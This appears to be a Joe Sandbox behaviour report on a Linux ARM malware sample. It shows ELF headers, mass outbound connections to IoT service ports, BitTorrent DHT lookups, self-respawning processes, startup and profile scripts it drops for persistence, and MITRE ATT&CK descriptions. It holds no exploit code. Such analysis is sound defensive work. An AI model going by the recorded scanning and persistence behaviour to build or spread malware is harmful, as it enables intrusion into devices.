Source: global traffic	TCP traffic: 98.1.76.193 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 189.97.112.66 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 154.3.70.165 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 66.144.204.153 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 30.105.245.140 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 9.31.180.218 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 202.86.252.99 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 9.3.250.91 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 131.143.33.147 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 1.186.104.107 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 159.53.131.234 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 154.74.21.50 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 168.240.219.165 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 51.187.225.124 ports 1,2,3,5,7,37215
Source: global traffic	TCP traffic: 25.215.228.98 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 80.165.24.201 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 116.182.89.143 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 73.87.35.147 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 155.59.30.234 ports 1,2,4,5,9,49152
Source: global traffic	TCP traffic: 72.173.127.108 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 44.87.62.109 ports 2,5,6,8,9,52869
Source: global traffic	TCP traffic: 86.84.186.192 ports 2,5,6,8,9,52869

ELF header
Class:	ELF32
Data:	2's complement, little endian
Version:	1 (current)
Machine:	ARM
Version Number:	0x1
Type:	EXEC (Executable file)
OS/ABI:	UNIX - System V
ABI Version:	0
Entry Point Address:	0x8194
Flags:	0x4000002
ELF Header Size:	52
Program Header Offset:	52
Program Header Size:	32
Number of Program Headers:	5
Section Header Offset:	307280
Section Header Size:	40
Number of Section Headers:	17
Header String Table Index:	16

Name	Type	Address	Offset	Size	EntSize	Flags	Flags Description	Link	Align
	NULL	0x0	0x0	0x0	0x0	0x0		0	0
.init	PROGBITS	0x80d4	0xd4	0x10	0x0	0x6	AX	0	4
.text	PROGBITS	0x80f0	0xf0	0x34a98	0x0	0x6	AX	0	16
.fini	PROGBITS	0x3cb88	0x34b88	0x10	0x0	0x6	AX	0	4
.rodata	PROGBITS	0x3cb98	0x34b98	0xb9d0	0x0	0x2	A	0	8
.ARM.extab	PROGBITS	0x48568	0x40568	0x18	0x0	0x2	A	0	4
.ARM.exidx	ARM_EXIDX	0x48580	0x40580	0x128	0x0	0x82	AL	2	4
.eh_frame	PROGBITS	0x51000	0x41000	0x4	0x0	0x3	WA	0	4
.tbss	NOBITS	0x51004	0x41004	0x8	0x0	0x403	WAT	0	4
.init_array	INIT_ARRAY	0x51004	0x41004	0x4	0x0	0x3	WA	0	4
.fini_array	FINI_ARRAY	0x51008	0x41008	0x4	0x0	0x3	WA	0	4
.data.rel.ro	PROGBITS	0x51010	0x41010	0x18	0x0	0x3	WA	0	4
.got	PROGBITS	0x51028	0x41028	0xb8	0x4	0x3	WA	0	4
.data	PROGBITS	0x510e0	0x410e0	0x9ec8	0x0	0x3	WA	0	8
.bss	NOBITS	0x5afa8	0x4afa8	0x25b90	0x0	0x3	WA	0	8
.ARM.attributes	ARM_ATTRIBUTES	0x0	0x4afa8	0x16	0x0	0x0		0	1
.shstrtab	STRTAB	0x0	0x4afbe	0x90	0x0	0x0		0	1

Type	Offset	Virtual Address	Physical Address	File Size	Memory Size	Entropy	Flags	Flags Description	Align	Section Mappings
EXIDX	0x40580	0x48580	0x48580	0x128	0x128	2.1681	0x4	R	0x4	.ARM.exidx
LOAD	0x0	0x8000	0x8000	0x406a8	0x406a8	3.5102	0x5	R E	0x8000	.init .text .fini .rodata .ARM.extab .ARM.exidx
LOAD	0x41000	0x51000	0x51000	0x9fa8	0x2fb38	1.9570	0x6	RW	0x8000	.eh_frame .init_array .fini_array .data.rel.ro .got .data .bss
TLS	0x41004	0x51004	0x51004	0x0	0x8	0.0000	0x4	R	0x4
GNU_STACK	0x0	0x0	0x0	0x0	0x0	0.0000	0x7	RWE	0x4

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 21, 2022 04:32:38.652656078 CET	42516	80	192.168.2.23	109.202.202.202
Jan 21, 2022 04:32:40.076400995 CET	23	39772	125.142.139.91	192.168.2.23
Jan 21, 2022 04:32:40.076977968 CET	39772	23	192.168.2.23	125.142.139.91
Jan 21, 2022 04:32:45.524811983 CET	35306	81	192.168.2.23	205.124.213.207
Jan 21, 2022 04:32:45.524910927 CET	39528	5555	192.168.2.23	153.229.65.202
Jan 21, 2022 04:32:45.524981976 CET	41028	8080	192.168.2.23	6.10.246.119
Jan 21, 2022 04:32:45.525002956 CET	45090	80	192.168.2.23	46.3.169.39
Jan 21, 2022 04:32:45.525038958 CET	40010	80	192.168.2.23	105.166.137.150
Jan 21, 2022 04:32:45.525060892 CET	49260	80	192.168.2.23	121.159.104.6
Jan 21, 2022 04:32:45.525089979 CET	47876	37215	192.168.2.23	196.212.110.237
Jan 21, 2022 04:32:45.525134087 CET	46608	8080	192.168.2.23	78.233.217.54
Jan 21, 2022 04:32:45.525154114 CET	41374	52869	192.168.2.23	173.124.45.94
Jan 21, 2022 04:32:45.525187016 CET	45570	80	192.168.2.23	41.61.179.158
Jan 21, 2022 04:32:45.525295019 CET	59080	5555	192.168.2.23	217.132.116.242
Jan 21, 2022 04:32:45.525306940 CET	48488	8080	192.168.2.23	220.50.66.153
Jan 21, 2022 04:32:45.525343895 CET	58574	8080	192.168.2.23	68.208.81.105
Jan 21, 2022 04:32:45.525362968 CET	50322	8443	192.168.2.23	138.183.57.233
Jan 21, 2022 04:32:45.525369883 CET	33110	8443	192.168.2.23	76.69.130.42
Jan 21, 2022 04:32:45.525859118 CET	45232	80	192.168.2.23	81.157.18.69
Jan 21, 2022 04:32:45.525907040 CET	45482	80	192.168.2.23	25.117.44.31
Jan 21, 2022 04:32:45.525934935 CET	43134	8080	192.168.2.23	159.48.209.196
Jan 21, 2022 04:32:45.525975943 CET	33008	8080	192.168.2.23	154.37.153.102
Jan 21, 2022 04:32:45.526062965 CET	59876	5555	192.168.2.23	137.50.209.196
Jan 21, 2022 04:32:45.526109934 CET	49408	8080	192.168.2.23	170.247.26.46
Jan 21, 2022 04:32:45.526118040 CET	54016	80	192.168.2.23	146.252.138.219
Jan 21, 2022 04:32:45.526124954 CET	48922	37215	192.168.2.23	130.245.77.217
Jan 21, 2022 04:32:45.526141882 CET	47956	37215	192.168.2.23	170.248.31.222
Jan 21, 2022 04:32:45.526165009 CET	43910	8443	192.168.2.23	68.69.157.29
Jan 21, 2022 04:32:45.526190996 CET	54636	80	192.168.2.23	142.82.165.34
Jan 21, 2022 04:32:45.526238918 CET	50266	80	192.168.2.23	186.197.154.193
Jan 21, 2022 04:32:45.526252985 CET	58090	49152	192.168.2.23	199.253.175.69
Jan 21, 2022 04:32:45.526273012 CET	44844	52869	192.168.2.23	199.240.101.94
Jan 21, 2022 04:32:45.526302099 CET	35854	81	192.168.2.23	33.160.138.35
Jan 21, 2022 04:32:45.526329041 CET	34058	5555	192.168.2.23	29.14.250.60
Jan 21, 2022 04:32:45.526361942 CET	50176	80	192.168.2.23	44.230.88.116
Jan 21, 2022 04:32:45.526407003 CET	54756	7574	192.168.2.23	173.212.119.218
Jan 21, 2022 04:32:45.526422024 CET	38088	52869	192.168.2.23	42.217.20.173
Jan 21, 2022 04:32:45.526456118 CET	60968	5555	192.168.2.23	43.190.131.125
Jan 21, 2022 04:32:45.526485920 CET	37876	81	192.168.2.23	50.248.206.34
Jan 21, 2022 04:32:45.526520014 CET	40322	8443	192.168.2.23	4.143.102.140
Jan 21, 2022 04:32:45.526561022 CET	36922	52869	192.168.2.23	27.174.228.124
Jan 21, 2022 04:32:45.526586056 CET	55106	8080	192.168.2.23	112.81.89.51
Jan 21, 2022 04:32:45.526653051 CET	41068	8443	192.168.2.23	129.241.209.154
Jan 21, 2022 04:32:45.526731968 CET	49660	8080	192.168.2.23	68.252.36.133
Jan 21, 2022 04:32:45.526736021 CET	34462	52869	192.168.2.23	221.149.172.42
Jan 21, 2022 04:32:45.526783943 CET	37384	81	192.168.2.23	110.152.254.222
Jan 21, 2022 04:32:45.526786089 CET	58442	49152	192.168.2.23	189.97.112.66
Jan 21, 2022 04:32:45.526797056 CET	43052	8080	192.168.2.23	87.235.240.17
Jan 21, 2022 04:32:45.526812077 CET	51466	8080	192.168.2.23	201.214.117.34
Jan 21, 2022 04:32:45.526839018 CET	44722	81	192.168.2.23	9.171.24.117
Jan 21, 2022 04:32:45.526863098 CET	37420	80	192.168.2.23	171.221.140.142
Jan 21, 2022 04:32:45.526887894 CET	41400	37215	192.168.2.23	186.104.158.59
Jan 21, 2022 04:32:45.526920080 CET	56728	81	192.168.2.23	19.55.75.43
Jan 21, 2022 04:32:45.526948929 CET	59848	80	192.168.2.23	138.111.158.127
Jan 21, 2022 04:32:45.526962996 CET	37456	8080	192.168.2.23	162.23.204.195
Jan 21, 2022 04:32:45.526997089 CET	53214	8443	192.168.2.23	18.118.102.95
Jan 21, 2022 04:32:45.527040005 CET	53812	37215	192.168.2.23	154.64.50.131
Jan 21, 2022 04:32:45.527064085 CET	60714	7574	192.168.2.23	215.181.175.56
Jan 21, 2022 04:32:45.527118921 CET	46184	52869	192.168.2.23	148.234.153.158
Jan 21, 2022 04:32:45.527133942 CET	35944	52869	192.168.2.23	221.22.194.11
Jan 21, 2022 04:32:45.527187109 CET	45842	7574	192.168.2.23	19.172.197.250
Jan 21, 2022 04:32:45.527218103 CET	50168	80	192.168.2.23	89.240.138.118
Jan 21, 2022 04:32:45.540527105 CET	47804	81	192.168.2.23	80.224.60.31
Jan 21, 2022 04:32:45.540571928 CET	38922	49152	192.168.2.23	132.25.8.225
Jan 21, 2022 04:32:45.540584087 CET	46864	81	192.168.2.23	71.246.136.80
Jan 21, 2022 04:32:45.540623903 CET	39182	8080	192.168.2.23	61.22.15.228
Jan 21, 2022 04:32:45.540646076 CET	47472	8080	192.168.2.23	81.86.140.57
Jan 21, 2022 04:32:45.540698051 CET	47152	37215	192.168.2.23	51.187.225.124
Jan 21, 2022 04:32:45.540704966 CET	45250	8080	192.168.2.23	50.163.21.160
Jan 21, 2022 04:32:45.540750980 CET	35128	8080	192.168.2.23	203.20.194.156
Jan 21, 2022 04:32:45.540777922 CET	45530	8443	192.168.2.23	67.131.91.142
Jan 21, 2022 04:32:45.540851116 CET	41274	80	192.168.2.23	175.165.203.42
Jan 21, 2022 04:32:45.540853024 CET	60868	37215	192.168.2.23	193.151.195.55
Jan 21, 2022 04:32:45.540874004 CET	58342	80	192.168.2.23	156.90.228.57
Jan 21, 2022 04:32:45.540879965 CET	43540	52869	192.168.2.23	66.144.204.153
Jan 21, 2022 04:32:45.540930033 CET	60336	80	192.168.2.23	34.118.204.216
Jan 21, 2022 04:32:45.540939093 CET	36914	7574	192.168.2.23	220.30.46.103
Jan 21, 2022 04:32:45.540946007 CET	40246	80	192.168.2.23	95.47.77.138
Jan 21, 2022 04:32:45.540960073 CET	60414	8443	192.168.2.23	9.204.96.218
Jan 21, 2022 04:32:45.540966988 CET	58752	8443	192.168.2.23	154.109.129.144
Jan 21, 2022 04:32:45.541006088 CET	57614	81	192.168.2.23	133.36.110.167
Jan 21, 2022 04:32:45.541009903 CET	49518	8080	192.168.2.23	60.67.161.42
Jan 21, 2022 04:32:45.541039944 CET	56050	49152	192.168.2.23	33.104.165.118
Jan 21, 2022 04:32:45.541071892 CET	45352	80	192.168.2.23	214.223.170.145
Jan 21, 2022 04:32:45.541095972 CET	48408	80	192.168.2.23	130.103.143.58
Jan 21, 2022 04:32:45.541204929 CET	58808	5555	192.168.2.23	46.214.146.214
Jan 21, 2022 04:32:45.541265965 CET	59862	8443	192.168.2.23	192.104.60.72
Jan 21, 2022 04:32:45.541285992 CET	36150	52869	192.168.2.23	57.34.192.239
Jan 21, 2022 04:32:45.541310072 CET	55874	8443	192.168.2.23	158.188.13.58
Jan 21, 2022 04:32:45.541332960 CET	37376	81	192.168.2.23	93.156.82.165
Jan 21, 2022 04:32:45.541351080 CET	32994	5555	192.168.2.23	31.105.131.88
Jan 21, 2022 04:32:45.541363955 CET	59156	8080	192.168.2.23	37.192.134.201
Jan 21, 2022 04:32:45.541414976 CET	53758	8443	192.168.2.23	177.2.102.121
Jan 21, 2022 04:32:45.541439056 CET	43908	8080	192.168.2.23	132.128.81.209
Jan 21, 2022 04:32:45.541454077 CET	44012	80	192.168.2.23	149.161.182.82
Jan 21, 2022 04:32:45.541474104 CET	42302	5555	192.168.2.23	205.128.172.162
Jan 21, 2022 04:32:45.541513920 CET	36700	52869	192.168.2.23	198.245.112.146
Jan 21, 2022 04:32:45.541546106 CET	35360	80	192.168.2.23	168.11.88.234
Jan 21, 2022 04:32:45.541624069 CET	53144	7574	192.168.2.23	78.253.124.85
Jan 21, 2022 04:32:45.541625977 CET	40944	80	192.168.2.23	110.80.210.168

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Jan 21, 2022 04:33:27.367419004 CET	192.168.2.23	1.1.1.1	0x405e	Standard query (0)	dht.transmissionbt.com	A (IP address)	IN (0x0001)
Jan 21, 2022 04:33:27.389657021 CET	192.168.2.23	1.1.1.1	0xbfa5	Standard query (0)	router.bittorrent.com	A (IP address)	IN (0x0001)
Jan 21, 2022 04:33:27.410676956 CET	192.168.2.23	1.1.1.1	0xab7b	Standard query (0)	router.utorrent.com	A (IP address)	IN (0x0001)
Jan 21, 2022 04:33:27.432109118 CET	192.168.2.23	1.1.1.1	0xa610	Standard query (0)	bttracker.debian.org	A (IP address)	IN (0x0001)

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Jan 21, 2022 04:33:27.383748055 CET	1.1.1.1	192.168.2.23	0x405e	No error (0)	dht.transmissionbt.com		87.98.162.88	A (IP address)	IN (0x0001)
Jan 21, 2022 04:33:27.383748055 CET	1.1.1.1	192.168.2.23	0x405e	No error (0)	dht.transmissionbt.com		212.129.33.59	A (IP address)	IN (0x0001)
Jan 21, 2022 04:33:27.406356096 CET	1.1.1.1	192.168.2.23	0xbfa5	No error (0)	router.bittorrent.com		67.215.246.10	A (IP address)	IN (0x0001)
Jan 21, 2022 04:33:27.427524090 CET	1.1.1.1	192.168.2.23	0xab7b	No error (0)	router.utorrent.com		82.221.103.244	A (IP address)	IN (0x0001)
Jan 21, 2022 04:33:27.448868036 CET	1.1.1.1	192.168.2.23	0xa610	No error (0)	bttracker.debian.org	bttracker.acc.umu.se		CNAME (Canonical name)	IN (0x0001)
Jan 21, 2022 04:33:27.448868036 CET	1.1.1.1	192.168.2.23	0xa610	No error (0)	bttracker.acc.umu.se		130.239.18.158	A (IP address)	IN (0x0001)

Start time:	04:32:28
Start date:	21/01/2022
Path:	/usr/bin/dash
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time:	04:32:37
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	/tmp/ZFvtIZszMd
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:32:39
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:32:54
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:32:55
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:32:56
Start date:	21/01/2022
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Start time:	04:32:44
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:32:49
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:32:59
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report ZFvtIZszMd

Overview

General Information

Detection

Signatures

Classification

Analysis Advice

General Information

Warnings

Runtime Messages

Process Tree

Yara Overview

Initial Sample

Dropped Files

Memory Dumps

Jbx Signature Overview

AV Detection

Spreading

Networking

Spam, unwanted Advertisements and Ransom Demands

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/grub/i386-pc/modinfo.sh

/etc/acpi/asus-keyboard-backlight.sh

/etc/acpi/asus-wireless.sh

/etc/acpi/ibm-wireless.sh

/etc/acpi/tosh-wireless.sh

/etc/acpi/undock.sh

/etc/console-setup/cached_setup_font.sh

/etc/console-setup/cached_setup_keyboard.sh

/etc/console-setup/cached_setup_terminal.sh

/etc/gdm3/config-error-dialog.sh

/etc/init.d/S95baby.sh

/etc/init.d/console-setup.sh

/etc/init.d/hwclock.sh

/etc/init.d/keyboard-setup.sh

/etc/profile.d/01-locale-fix.sh

/etc/profile.d/Z97-byobu.sh

/etc/profile.d/Z99-cloud-locale-test.sh

/etc/profile.d/Z99-cloudinit-warnings.sh

/etc/profile.d/apps-bin-path.sh

/etc/profile.d/bash_completion.sh

/etc/profile.d/cedilla-portuguese.sh

/etc/profile.d/gawk.sh

/etc/profile.d/im-config_wayland.sh

/etc/profile.d/vte-2.91.sh

/etc/profile.d/xdg_dirs_desktop_session.sh

/etc/rcS.d/S95baby.sh

Linux Analysis Report
ZFvtIZszMd

Start time:	04:33:00
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:33:01
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:33:02
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:33:04
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:33:25
Start date:	21/01/2022
Path:	/tmp/ZFvtIZszMd
Arguments:	n/a
File size:	4956856 bytes
MD5 hash:	5ebfcae4fe2471fcc5695c2394773ff1

Start time:	04:33:26
Start date:	21/01/2022
Path:	/bin/sh
Arguments:	n/a
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the at utility to perform task scheduling for initial or recurring execution of malicious code. The at command within Linux operating systems enables administrators to schedule tasks.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence by executing malicious content triggered by a user’s shell. `~/.bash_profile` and `~/.bashrc` are shell scripts that contain shell commands. These files are executed in a user's context when a new shell opens or when a user logs in so that their environment is set correctly.
Tactics:	Persistence, Privilege Escalation
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre